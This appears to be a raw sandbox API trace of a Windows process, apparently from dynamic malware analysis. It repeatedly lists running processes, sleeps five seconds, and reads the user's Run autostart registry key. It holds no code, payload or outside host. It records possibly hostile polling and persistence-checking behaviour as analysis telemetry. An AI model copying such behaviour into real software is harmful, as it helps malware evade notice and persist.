BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.830] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.857] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.860] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.860] NtClose (Handle=0x274) returned 0x0 [0176.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.873] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.886] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.887] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.887] NtClose (Handle=0x274) returned 0x0 [0176.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.892] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.898] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.899] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.953] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.956] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.956] NtClose (Handle=0x274) returned 0x0 [0176.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.982] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.996] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.997] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.997] NtClose (Handle=0x274) returned 0x0 [0176.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.009] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.015] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.016] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.016] NtClose (Handle=0x274) returned 0x0 [0177.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.028] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.036] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.038] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.038] NtClose (Handle=0x274) returned 0x0 [0177.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.048] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.058] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.060] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.060] NtClose (Handle=0x274) returned 0x0 [0177.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.073] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.079] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.080] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.080] NtClose (Handle=0x274) returned 0x0 [0177.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.096] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.108] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.110] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.110] NtClose (Handle=0x274) returned 0x0 [0177.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.121] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.131] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.132] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.132] NtClose (Handle=0x274) returned 0x0 [0177.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.144] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.146] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.147] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.147] NtClose (Handle=0x274) returned 0x0 [0177.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.161] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.177] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.179] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.179] NtClose (Handle=0x274) returned 0x0 [0177.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.188] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.204] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.206] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.206] NtClose (Handle=0x274) returned 0x0 [0177.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 